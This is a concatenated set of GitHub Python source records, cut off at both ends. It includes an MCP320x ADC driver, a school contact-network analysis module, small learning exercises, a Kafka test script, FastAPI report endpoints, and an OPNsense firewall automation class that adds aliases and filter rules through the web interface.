\"MCP3004\": (4, 10),\n \"MCP3008\": (8, 10)\n }\n\n if chip in chip_dictionary:\n self._ChannelMax = chip_dictionary[chip][0]\n self._BitLength = chip_dictionary[chip][1]\n elif chip is None and (channel_max is not None) and (bit_length is not None):\n self._ChannelMax = channel_max\n self._BitLength = bit_length\n else:\n print(\"Unknown chip: {} - Please re-initialize.\")\n self._ChannelMax = 0\n self._BitLength = 0\n return\n\n self._SingleEnded = single_ended\n self._Vref = 3.3\n self._values = MyValues(self.read_adc, self._ChannelMax)\n self._volts = MyValues(self.read_volts, self._ChannelMax)\n\n # This is used to speed up the SPIDEV communication. Send out MSB first.\n # control[0] - bit7-3: upper 5 bits 0, because we can only send 8 bit sequences.\n # - bit2 : Start bit - starts conversion in ADCs\n # - bit1 : Select single_ended=1 or differential=0\n # - bit0 : D2 high bit of channel select.\n # control[1] - bit7 : D1 middle bit of channel select.\n # - bit6 : D0 low bit of channel select.\n # - bit5-0 : Don't care.\n if self._SingleEnded:\n self._control0 = [0b00000110, 0b00000000, 0] # Pre-compute part of the control word.\n else:\n self._control0 = [0b00000100, 0b00000000, 0] # Pre-compute part of the control word.\n\n if self._MOSI > 0: # Bit Bang mode\n assert self._MISO != 0 and self._CLK < 32\n if GPIO.getmode() != 11:\n GPIO.setmode(GPIO.BCM) # Use the BCM numbering scheme\n\n GPIO.setup(self._CLK, GPIO.OUT) # Setup the ports for in and output\n GPIO.setup(self._MOSI, GPIO.OUT)\n GPIO.setup(self._MISO, GPIO.IN)\n GPIO.setup(self._CS_bar, GPIO.OUT)\n\n GPIO.output(self._CLK, 0) # Set the clock low.\n GPIO.output(self._MOSI, 0) # Set the Master Out low\n GPIO.output(self._CS_bar, 1) # Set the CS_bar high\n\n else:\n self._dev = spidev.SpiDev(0, self._CS_bar) # Start a SpiDev device\n self._dev.mode = 0 # Set SPI mode (phase)\n self._dev.max_speed_hz = self._CLK # Set the data rate\n self._dev.bits_per_word = 8 # Number of bit per word. ALWAYS 8\n\n def __del__(self):\n \"\"\" Cleanup the GPIO before being destroyed \"\"\"\n if self._MOSI > 0:\n GPIO.cleanup(self._CS_bar)\n GPIO.cleanup(self._CLK)\n GPIO.cleanup(self._MOSI)\n GPIO.cleanup(self._MISO)\n\n def get_channel_max(self):\n \"\"\"Return the maximum number of channels\"\"\"\n return self._ChannelMax\n\n def get_bit_length(self):\n \"\"\"Return the number of bits that will be read\"\"\"\n return self._BitLength\n\n def get_value_max(self):\n \"\"\"Return the maximum value possible for an ADC read\"\"\"\n return 2 ** self._BitLength - 1\n\n def send_bit(self, bit):\n \"\"\" Send out a single bit, and pulse clock.\"\"\"\n if self._MOSI == 0:\n return\n #\n # The input is read on the rising edge of the clock.\n #\n GPIO.output(self._MOSI, bit) # Set the bit.\n GPIO.output(self._CLK, 1) # Rising edge sends data\n GPIO.output(self._CLK, 0) # Return clock to zero.\n\n def read_bit(self):\n \"\"\" Read a single bit from the ADC and pulse clock.\"\"\"\n if self._MOSI == 0:\n return 0\n #\n # The output is going out on the falling edge of the clock,\n # and is to be read on the rising edge of the clock.\n\n # Clock should be already low, and data should already be set.\n GPIO.output(self._CLK, 1) # Set the clock high. Ready to read.\n bit = GPIO.input(self._MISO) # Read the bit.\n GPIO.output(self._CLK, 0) # Return clock low, next bit will be set.\n\n return bit\n\n def read_adc(self, channel):\n \"\"\"This reads the actual ADC value, after connecting the analog multiplexer to\n the desired channel.\n ADC value is returned at a n-bit integer value, with n=10 or 12 depending on the chip.\n The value can be converted to a voltage with:\n volts = data*Vref/(2**n-1)\"\"\"\n if channel < 0 or channel >= self._ChannelMax:\n print(\"Error - chip does not have channel = {}\".format(channel))\n\n if self._MOSI == 0:\n # SPIdev Code\n # This builds up the control word, which selects the channel\n # and sets single/differential more.\n control = [self._control0[0] + ((channel & 0b100) >> 2), self._control0[1]+((channel & 0b011) << 6), 0]\n dat = self._dev.xfer(control)\n value = (dat[1] << 8)+dat[2] # Unpack the two 8-bit words to a single integer.\n return value\n\n else:\n # Bit Bang code.\n # To read out this chip you need to send:\n # 1 - start bit\n # 2 - Single ended (1) or differential (0) mode\n # 3 - Channel select: 1 bit for x=2 or 3 bits for x=4,8\n # 4 - MSB first (1) or LSB first (0)\n #\n # Start of sequence sets CS_bar low, and sends sequence\n #\n GPIO.output(self._CLK, 0) # Make sure clock starts low.\n GPIO.output(self._MOSI, 0)\n GPIO.output(self._CS_bar, 0) # Select the chip.\n self.send_bit(1) # Start bit = 1\n self.send_bit(self._SingleEnded) # Select single or differential\n if self._ChannelMax > 2:\n self.send_bit(int((channel & 0b100) > 0)) # Send high bit of channel = DS2\n self.send_bit(int((channel & 0b010) > 0)) # Send mid bit of channel = DS1\n self.send_bit(int((channel & 0b001) > 0)) # Send low bit of channel = DS0\n else:\n self.send_bit(channel)\n\n self.send_bit(0) # MSB First (for MCP3x02) or don't care.\n\n # The clock is currently low, and the dummy bit = 0 is on the output of the ADC\n #\n self.read_bit() # Read the bit.\n\n data = 0\n for i in range(self._BitLength):\n # Note you need to shift left first, or else you shift the last bit (bit 0)\n # to the 1 position.\n data <<= 1\n bit = self.read_bit()\n data += bit\n\n GPIO.output(self._CS_bar, 1) # Unselect the chip.\n\n return data\n\n def read_volts(self, channel):\n \"\"\"Read the ADC value from channel and convert to volts, assuming that Vref is set correctly. \"\"\"\n return self._Vref * self.read_adc(channel) / self.get_value_max()\n\n def fast_read_adc0(self):\n \"\"\"This reads the actual ADC value of channel 0, with as little overhead as possible.\n Use with SPIDEV ONLY!!!!\n returns: The ADC value as an n-bit integer value, with n=10 or 12 depending on the chip.\"\"\"\n\n dat = self._dev.xfer(self._control0)\n value = (dat[1] << 8) + dat[2]\n return value\n\n @property\n def values(self):\n \"\"\"ADC values presented as a list.\"\"\"\n return self._values\n\n @property\n def volts(self):\n \"\"\"ADC voltages presented as a list\"\"\"\n return self._volts\n\n @property\n def accuracy(self):\n \"\"\"The fractional voltage of the least significant bit. \"\"\"\n return self._Vref / float(self.get_value_max())\n\n @property\n def vref(self):\n \"\"\"Reference voltage used by the chip. You need to set this. It defaults to 3.3V\"\"\"\n return self._Vref\n\n @vref.setter\n def vref(self, vr):\n self._Vref = vr\n\n\ndef main(argv):\n \"\"\"Test code for the MCP320x driver. This assumes you are using a MCP3208\n If no arguments are supplied, then use SPIdev for CE0 and read channel 0\"\"\"\n\n if len(argv) < 3:\n print(\"Args : \", argv)\n cs_bar = 0\n clk_pin = 1000000\n mosi_pin = 0\n miso_pin = 0\n if len(argv) < 2:\n channel = 0\n else:\n channel = int(argv[1])\n \n elif len(argv) < 6:\n print(\"Please supply: cs_bar_pin clk_pin mosi_pin miso_pin channel\")\n sys.exit(1)\n\n else:\n cs_bar = int(argv[1])\n clk_pin = int(argv[2])\n mosi_pin = int(argv[3])\n miso_pin = int(argv[4])\n channel = int(argv[5])\n\n adc_chip = MCP320x(cs_bar, clk_pin, mosi_pin, miso_pin)\n try:\n while True:\n value = adc_chip.read_adc(channel)\n print(\"{:4d}\".format(value))\n time.sleep(0.1)\n except KeyboardInterrupt:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n import sys\n import time\n main(sys.argv)\n","repo_name":"mholtrop/Phys605","sub_path":"Python/DevLib/MCP320x.py","file_name":"MCP320x.py","file_ext":"py","file_size_in_byte":11970,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"74367745096","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 09:10:58 2018\n\n@author: LAPT0084\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 14:49:57 2018\n\n@author: LAPT0084\n\"\"\"\n\n\nimport networkx as nx \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\nimport create_secpri as cs\nimport data_loader as dl\n\n\nbasepath = os.path.dirname(__file__)\nschools_path = basepath + \"/../data/\"\n\ndef build_school_network(): \n secpri = cs.create_secpri_multi()\n schools_net = make_network(secpri)\n return schools_net\n\n\n\ndef build_network_alinks(data_path = schools_path + r'/actual_links.csv'):\n\n alinks = pd.read_csv(data_path)\n \n data_net = nx.Graph()\n \n \n edges = np.array(alinks[['BRINVEST1', 'BRINVEST2']])\n weights = [float(w) for w in alinks.aantal]\n \n \n for n in set(list(alinks.BRINVEST1) + list(alinks.BRINVEST2)):\n data_net.add_node(n)\n \n for i, edge in enumerate(edges):\n c_ij = min(500., weights[i])\n data_net.add_edge(*edge, weight=c_ij , inv_weight=1./c_ij)\n \n \n return data_net\n\n\n\n\n\ndef make_network(school_frame, HH_dist_frame = 'default'):\n \n schools_net = nx.Graph()\n \n secondary_urns = school_frame.SecondaryURN.unique()\n #secondary_names = secpri['INSTELLINGSNAAM VO'].unique()\n schools_net.add_nodes_from(secondary_urns, typ='Sec')\n \n primary_urns = school_frame.Primary_School_URN.unique()\n #primary_names = school_frame['INSTELLINGSNAAM PO'].unique()\n schools_net.add_nodes_from(primary_urns, typ='Pri')\n \n edges = np.array(school_frame[['SecondaryURN', 'Primary_School_URN']])\n weights = np.array([float(w) for w in school_frame.pupil_count])\n for i, edge in enumerate(edges):\n if isinstance(HH_dist_frame, str):\n c_ij = edge_weight(weight=weights[i], ave_age_diff=3.)\n else:\n c_ij = edge_weight(weight=weights[i], ave_age_diff=3. , prop_c = np.array(HH_dist_frame.loc[edge[1]]))\n schools_net.add_edge(*edge, weight = c_ij , inv_weight=c_ij, pup_count=weights[i], inv_pup_count=weights[i])\n \n \n return schools_net\n\ndef edge_weight(weight=1., ave_age_diff=1., prop_c = np.array([0.2, 0.3, 0.35, 0.1, 0.05])):\n \n rho = lambda n: sum([k * (n-k) for k in np.arange(1, n)])/((n-1.)+0.0000000000000000001)\n nobs = lambda n: prop_c[n-1] * (n - 1) / n\n weight_new = weight * ave_age_diff * sum([rho(n) * nobs(n) for n in np.arange(1, int(len(prop_c) + 1))])\n \n \n return weight_new\n\n\ndef geo_dist(data, node1, node2):\n \n return np.array(data.query(\"BRIN == @node1\").geometry)[0].distance(np.array(data.query(\"BRIN == @node2\").geometry)[0])\n \n\n\ndef make_random_network(net, school_frame, school_data):\n \n ran_net = nx.Graph()\n \n secondary_urns = [s for s in school_frame.SecondaryURN.unique() if s in map(str, school_data.BRIN)]\n\n ran_net.add_nodes_from(secondary_urns, typ='Sec')\n \n primary_urns = [p for p in school_frame.Primary_School_URN.unique() if p in map(str, school_data.BRIN)]\n #primary_names = school_frame['INSTELLINGSNAAM PO'].unique()\n ran_net.add_nodes_from(primary_urns, typ='Pri')\n \n for sec in secondary_urns[:1]: \n \n link_weights = np.array([[pri , net.degree(pri, weight='weight')/geo_dist(school_data, sec, pri)] for pri in primary_urns])\n #link_weights = link_weights / sum(link_weights)\n \n lw_n = link_weights[:,0]\n lw_w = np.array(map(float, link_weights[:,1]))\n \n lw_w_edge = net.degree(sec, weight='weight') * lw_w / sum(lw_w)\n \n for i, p in enumerate(lw_n):\n ran_net.add_edge(p, sec, weight=lw_w_edge[i])\n \n \n \n \n return ran_net\n \n\ndef make_random_adjmat(net, school_frame, school_data, p=1., rule = 'power', sec_pri_only=True):\n \n school_data_match = school_data.query('BRIN in @net.nodes()')\n \n \n \n print( len(school_data_match))\n \n \n nodelist = np.array(school_data_match.BRIN)\n \n xs = np.array(school_data_match.x_coord)\n ys = np.array(school_data_match.y_coord)\n \n xmat = np.array([list(xs)]*len(xs)).T\n ymat = np.array([list(ys)]*len(ys)).T\n \n dist_mat = ((xmat - xs)**2 + (ymat - ys)**2)**0.5\n if rule == 'power': \n inv_dist_mat = 1./dist_mat**p\n inv_dist_mat[np.where(inv_dist_mat == inv_dist_mat[0,0])] = 0.\n \n elif rule == 'gauss': \n inv_dist_mat = np.exp(-1. * (dist_mat/1000.) ** p)\n inv_dist_mat = inv_dist_mat * -(np.identity(len(nodelist)) - 1.)\n #return dist_mat, inv_dist_mat\n \n else:\n print( 'enter valid rule: \"power\" or \"gauss\"')\n return 0, 0, 0\n \n \n \n degs = [net.degree(k, weight='weight') for k in school_data_match.BRIN]\n degmat = np.array([degs]*len(degs))\n deg_scaled_mat = inv_dist_mat * degmat\n \n if sec_pri_only == True:\n \n kinds = np.array(school_data_match.kind)\n kinds_mat = np.array([list(kinds)]*len(kinds)).T\n sec_pri_link = kinds_mat != kinds\n \n deg_scaled_mat_sp = sec_pri_link * deg_scaled_mat \n \n \n \n contact_mat = degmat * deg_scaled_mat_sp/sum(deg_scaled_mat_sp)\n \n else: \n contact_mat = deg_scaled_mat\n \n \n \n \n return contact_mat, nodelist, dist_mat\n\n\ndef compare_nets(adjmat, net, school_frame, school_data, rule='gauss', ps=np.arange(0.5, 0.85, 0.05)):\n aj_mats = []\n for p in ps:\n contact_mat = make_random_adjmat(net, school_frame, school_data, p, 'gauss')\n dist_dist_c = sum(contact_mat[0] * contact_mat[2]) / (sum(contact_mat[0])+1.e-15)\n h, b = np.histogram(dist_dist_c, bins=range(0,20000, 500))\n plt.plot(b[:-1],h, alpha=0.9)\n aj_mats.append(contact_mat)\n \n dist_dist_d = sum(adjmat * contact_mat[2]) / (sum(adjmat)+1.e-15)\n \n hd, bd = np.histogram(dist_dist_d, bins=range(0,20000, 500))\n \n plt.plot(bd[:-1],hd,'kx-', alpha=0.8)\n \n plt.legend(labels=list(ps) + ['data'])\n \n return aj_mats\n \n \n \n","repo_name":"jdmunday/SchoolsMealesNL","sub_path":"functions/make_network.py","file_name":"make_network.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39346703761","text":"file = input(\"Enter the input file name: \")\n\ncounter = {}\n\nwith open(file) as f:\n word_list = f.read().split()\n \n for word in sorted(word_list):\n counter.update({word:0})\n\n for x in counter.keys():\n for word in word_list:\n if word == x:\n counter[word] += 1\n\n\nprint(counter)","repo_name":"azakimi123/Python","sub_path":"dictionary_counter.py","file_name":"dictionary_counter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14071678895","text":"from sys import exit\n\ndef gold_room():\n print(\"This room is full of gold. How much do you take?\")\n #Wir fragen ab, wie viel Gold wir nehmen wollen und speichern das\n #in \"choice\" (ist ein String)\n choice = input(\"> \")\n how_much=int(choice)\n #Wenn eine Null oder eine Eins in der Eingabe mit dabei ist...\n if how_much == 1 or how_much == 0:\n #...wandeln wir die String Eingabe in den Int Datentyp um\n #und speichern den Wert als how_much\n dead(\"Man, learn to type a number\")\n\n if how_much < 50:\n print(\"Nice, you're not greedy, you win!\")\n exit(0)\n\n else:\n dead(\"You greedy bastard!\")\n\n\ndef bear_room():\n print(\"There is a bear here\")\n print(\"The bear has a bunch of honey\")\n print(\"The fat bear is in front of another door.\")\n print(\"How are you going to move the bear?\")\n print(\"Your options are: , , \")\n bear_moved= False\n\n while True:\n choice = input(\"> \")\n\n if choice == \"take honey\":\n dead(\"The bear looks at you then slaps your face off\")\n\n #Eine weitere If Abfrage\n elif choice == \"taunt bear\" and not bear_moved:\n print(\"The bear has moved from the door\")\n print(\"You can go through it now\")\n bear_moved= True\n\n elif choice == \"taunt bear\" and bear_moved:\n dead(\"The bear gets pissed off and chews your leg off.\")\n\n elif choice == \"open door\" and bear_moved:\n gold_room()\n\n else:\n print(\"I got no idea what that means. Try again.\")\n\n\ndef cthulhu_room():\n print(\"Here you see great evil Cthulu.\")\n print(\"He, it, whatever stares at you and you go insane\")\n print(\"Do you flee for your life or eat your head?\")\n\n choice = input(\"> \")\n\n if \"flee\" in choice:\n start()\n elif \"head\" in choice:\n dead(\"Well that was tasty!\")\n else: cthulhu_room()\n\n#Diese Funktion rufen wir ja oben immer auf (z.B. dead(\"You are dead\")\n#also wird die Funktion mit dem String \"You are dead\" aufgerufen ud\n#you are dead als why mit in die Funktion gegeben )\ndef dead(why):\n print(why, \"Good job!\")\n exit(0)\n\ndef start():\n print(\"You are in a dark room \")\n print(\"There is a door to your right and left\")\n print(\"Which one do you take?\")\n\n choice = input (\"> \")\n\n if choice == \"left\":\n bear_room()\n elif choice == \"right\":\n cthulhu_room()\n else:\n dead(\"You stumble around the room until you starve\")\n\n\nstart()\n","repo_name":"ad002/LPTHW","sub_path":"ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"2988464709","text":"from io import BytesIO\nfrom fastavro import reader, parse_schema, schemaless_writer, schemaless_reader\nfrom confluent_kafka import Consumer, SerializingProducer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroSerializer\n\nfrom huub_schemas import DeliveryEventV6AvroSchema\n\nconsumer_conf = {\n 'bootstrap.servers': '52.213.38.208:9092', \n 'group.id': 'landau_test_consumer6', \n 'auto.offset.reset': 'earliest'\n}\nsms_fields = [\n {'name': 'timestamp', 'type': 'long'},\n {'name': 'process_reference', 'type': ['null', 'string']},\n {'name': 'variant_id', 'type': 'int'},\n {'name': 'warehouse_id', 'type': 'int'},\n {'name': 'warehouse_name', 'type': 'string'},\n {'name': 'huubclient_id', 'type': 'int'},\n {'name': 'ean', 'type': 'string'},\n {'name': 'reference', 'type': 'string'},\n {'name': 'sales_channel_type', 'type': 'string'},\n {'name': 'delta', 'type': 'int'},\n {'name': 'stock_after_adjust', 'type': 'int'},\n]\n\nschema = {\n 'name': 'delivery_event',\n 'type': 'record',\n 'fields': DeliveryEventV6AvroSchema\n}\nparsed_schema = parse_schema(schema)\nconsumer = Consumer(consumer_conf)\nconsumer.subscribe(['delivery_events_v6_topic'])\n\n# producer \n\nschema_registry_conf = {\n 'url': 'http://schema-registry:8081'\n}\n\nschema_registry_client = SchemaRegistryClient(schema_registry_conf)\ndelivery_schema = schema_registry_client.get_schema(52)\n# delivery_schema = schema_registry_client.get_latest_version('delivery_event-value')\nprint(delivery_schema.schema_str)\ndelivery_serializer = AvroSerializer(schema_registry_client, delivery_schema.schema_str)\n\nproducer_conf = {\n 'bootstrap.servers': 'broker:29092', \n 'client.id': 'delivery_producer', \n 'value.serializer': delivery_serializer, \n 'plugin.library.paths': 'monitoring-interceptor'\n}\nproducer = SerializingProducer(producer_conf)\n\nwhile True:\n msg = consumer.poll()\n with BytesIO(msg.value()) as buff:\n value = schemaless_reader(buff, parsed_schema)\n print(value)\n break\n producer.produce('delivery_events_v6_topic', value=value)\n producer.flush()\n","repo_name":"landaudiogo/kafka-consumer-group-autoscaler","sub_path":"src/consumer_huub.py","file_name":"consumer_huub.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4441540837","text":"from tkinter import *\nfrom tkinter import ttk\n\nfrom component import Component\n\nclass TextRecognition(Component):\n def __init__(self, parent):\n super().__init__(parent, 'TextRecognition')\n # Labelled Frame\n self.labelframe = ttk.Labelframe(self.frame)\n self.labelframe.configure(text='Text Recognition', padding=10)\n # Buttons\n self.buttonNew = ttk.Button(self.labelframe)\n self.buttonNew.configure(\n text='Fuck'\n )\n self.buttonOpen = ttk.Button(self.labelframe)\n self.buttonOpen.configure(\n text='Shit'\n )\n self.buttonSave = ttk.Button(self.labelframe)\n self.buttonSave.configure(\n text='Bitch'\n )\n # Grid Configuration\n self.labelframe.grid(row=0, column=0, sticky=NSEW)\n self.buttonNew.grid(row=0, column=0, sticky=W)\n self.buttonOpen.grid(row=0, column=1)\n self.buttonSave.grid(row=0, column=2, sticky=E)","repo_name":"zyc-goose/4th-year-project-talking-handout","sub_path":"source-code/tk_widgets/textrec.py","file_name":"textrec.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16366784270","text":"from fastapi import APIRouter\nfrom fastapi import Query\nfrom typing import Optional\nfrom src.models.report import Report\n\n\n\nrouter = APIRouter(\n prefix=\"/report\",\n tags=[\"report\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/report_sub_total_sale/{customer_code}\")\nasync def report_sub_total_sale(customer_code):\n db_control=Report()\n start_length=90\n segment=20\n results=db_control.report_sub_total_sale(customer_code,start_length,segment)\n return results\n\n@router.get(\"/report_subtotal_item/{item_code}\")\nasync def report_subtotal_item(item_code):\n db_control=Report()\n start_length=90\n segment=10\n results=db_control.report_subtotal_item(item_code,start_length,segment)\n return results\n\n#get_sale_pie_by_customer_code(self,customer_code,start_length)\n@router.get(\"/get_sale_pie_by_customer_code/{customer_code}\")\nasync def get_sale_pie_by_customer_code(customer_code):\n db_control=Report()\n start_length=90\n results=db_control.get_sale_pie_by_customer_code(customer_code,start_length)\n return results\n","repo_name":"cjiamram/FishAPI","sub_path":"src/endpoints/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74213624135","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nCopyright 2023 CITRAIT\r\n// Permission is hereby granted, free of charge, to any person obtaining a \r\n// copy of this software and associated documentation files (the \"Software\"), \r\n// to deal in the Software without restriction, including without limitation \r\n// the rights to use, copy, modify, merge, publish, distribute, sublicense, \r\n// and/or sell copies of the Software, and to permit persons to whom the \r\n// Software is furnished to do so, subject to the following conditions:\r\n//\r\n// The above copyright notice and this permission notice shall be included in \r\n// all copies or substantial portions of the Software.\r\n//\r\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS \r\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \r\n// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \r\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING \r\n// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER \r\n// DEALINGS IN THE SOFTWARE.\r\n\"\"\"\r\nimport sys\r\nimport json\r\nimport urllib3\r\nimport requests\r\nimport xml.etree.ElementTree as ET\r\nimport re\r\nfrom base64 import b64decode\r\n\r\n\r\n\r\n\r\n# Class: Firewall\r\n# @Desc.: Represents a firewall api connection (opnsense)\r\n#\r\nclass Firewall:\r\n def __init__(self, user, password, baseurl):\r\n self.user = user\r\n self.password = password\r\n self.baseurl = baseurl\r\n self.csrftoken = ''\r\n self.hidden_name = ''\r\n self.hidden_value = ''\r\n self.http_session = requests.Session()\r\n # login on startup\r\n self.check_connection()\r\n \r\n\r\n def check_connection(self):\r\n print(f'connecting to firewall on {self.baseurl}')\r\n \r\n # requesting firewall landing page\r\n r = self.http_session.get(self.baseurl, verify=False)\r\n \r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token from landing page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n \r\n # submitting login form\r\n data = {self.hidden_name: self.hidden_value, 'usernamefld': self.user, 'passwordfld': self.password, 'login':'1'}\r\n r = self.http_session.post(self.baseurl, data=data, verify=False, allow_redirects=False )\r\n\r\n # checking if login was successful\r\n if r.status_code == 302 and 'Location' in r.headers:\r\n print(f'[+] firewall login sucessful')\r\n else:\r\n print(f'[-] invalid username or password for this firewall')\r\n\r\n\r\n \r\n #\r\n #\r\n # \r\n def add_alias(self, alias):\r\n # acessing aliaseses page to grab token\r\n r = self.http_session.get(f'{self.baseurl}/ui/firewall/alias', verify=False )\r\n \r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n alias_data = {\r\n \"alias\": {\r\n \"enabled\": \"1\",\r\n \"name\": alias[\"alias\"][\"name\"],\r\n \"type\": alias[\"alias\"][\"type\"],\r\n \"proto\": \"\",\r\n \"categories\": \"\",\r\n \"updatefreq\": \"\",\r\n \"content\": alias[\"alias\"][\"content\"],\r\n \"interface\": \"\",\r\n \"counters\": \"0\",\r\n \"description\": alias[\"alias\"][\"description\"]\r\n },\r\n \"network_content\":\"\"\r\n }\r\n \r\n # setup headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/ui/firewall/alias'\r\n \r\n # sending form of new alias:\r\n r = self.http_session.post(f'{self.baseurl}/api/firewall/alias/addItem/', verify=False, json=alias_data, headers=headers)\r\n if r.status_code == 200:\r\n print(f'[+] alias criado com sucesso!')\r\n return True\r\n else:\r\n print(f'[-] erro ao cadastrar novo alias.')\r\n return False\r\n\r\n\r\n\r\n\r\n def list_alias(self):\r\n url_alias_list = self.baseurl + 'firewall/alias/get'\r\n r = requests.get(url_alias_list, \r\n verify=False, \r\n auth=(self.api_key, self.api_secret))\r\n if r.status_code == 200:\r\n print(r.text)\r\n return True\r\n else:\r\n print(f'error adding alias: {r.text}')\r\n return False\r\n\r\n\r\n def del_alias(self, alias):\r\n pass\r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_filter_rule(self, rule):\r\n # acessing form of rules to grab token\r\n r = self.http_session.get(f'{self.baseurl}/firewall_rules_edit.php?if=lan', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n # filling form data for new rule\r\n data = {\r\n self.hidden_name: self.hidden_value, \r\n 'type': rule[\"rule\"]['action'],\r\n 'quick':'yes',\r\n 'interface': rule[\"rule\"]['interface'],\r\n 'direction':'in',\r\n 'ipprotocol': rule[\"rule\"]['ipprotocol'],\r\n 'protocol': 'any',\r\n 'src': rule[\"rule\"][\"source_net\"],\r\n 'srcmask':'32',\r\n 'srcbeginport': 'any',\r\n 'srcendport': 'any',\r\n 'dst': rule[\"rule\"][\"destination_net\"],\r\n 'dstmask':'32',\r\n 'dstbeginport': 'any',\r\n 'dstendport': 'any',\r\n 'descr': rule[\"rule\"][\"description\"],\r\n 'sched':'',\r\n 'gateway': '',\r\n 'reply-to':'',\r\n 'set-prio':'',\r\n 'set-prio-low':'',\r\n 'prio':'',\r\n 'tos':'',\r\n 'tag':'',\r\n 'tagged':'',\r\n 'max':'',\r\n 'max-src-nodes':'',\r\n 'max-src-conn':'',\r\n 'max-src-states':'',\r\n 'max-src-conn-rate':'',\r\n 'max-src-conn-rates':'',\r\n 'overload':'virusprot',\r\n 'statetimeout':'',\r\n 'adaptivestart':'',\r\n 'adaptiveend':'',\r\n 'os':'',\r\n 'statetype':'keep state',\r\n 'Submit':'Save'\r\n }\r\n \r\n # fix para alguns campos que podem ter sido omitidos nas regras\r\n if 'floating' in rule[\"rule\"]:\r\n data[\"floating\"] = \"1\"\r\n # for iface in rule[\"rule\"][\"interface\"].split(\",\")\r\n # data[\"interface[]\"]\r\n if 'gateway' in rule[\"rule\"]:\r\n data[\"gateway\"] = rule[\"rule\"][\"gateway\"]\r\n if 'protocol' in rule[\"rule\"]:\r\n data[\"protocol\"] = rule[\"rule\"][\"protocol\"]\r\n if 'srcnot' in rule[\"rule\"]:\r\n data[\"srcnot\"] = rule[\"rule\"][\"srcnot\"]\r\n if 'srcmask' in rule[\"rule\"]:\r\n data[\"srcmask\"] = rule[\"rule\"][\"srcmask\"]\r\n if 'dstmask' in rule[\"rule\"]:\r\n data[\"dstmask\"] = rule[\"rule\"][\"dstmask\"]\r\n if 'dstbeginport' in rule[\"rule\"]:\r\n # fix para porta destino como range (one field on pfsense, two separate fields in opnsense).\r\n if rule[\"rule\"][\"dstbeginport\"] is not None and '-' in rule[\"rule\"][\"dstbeginport\"]:\r\n data[\"dstbeginport\"] = rule[\"rule\"][\"dstbeginport\"].split(\"-\")[0]\r\n data[\"dstendport\"] = rule[\"rule\"][\"dstbeginport\"].split(\"-\")[1]\r\n else:\r\n data[\"dstbeginport\"] = rule[\"rule\"][\"dstbeginport\"]\r\n data[\"dstendport\"] = rule[\"rule\"][\"dstbeginport\"]\r\n \r\n\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/firewall_rules.php?if=lan'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {data}')\r\n \r\n # sending form of new rule:\r\n r = self.http_session.post(f'{self.baseurl}/firewall_rules_edit.php?if={data[\"interface\"]}', verify=False, 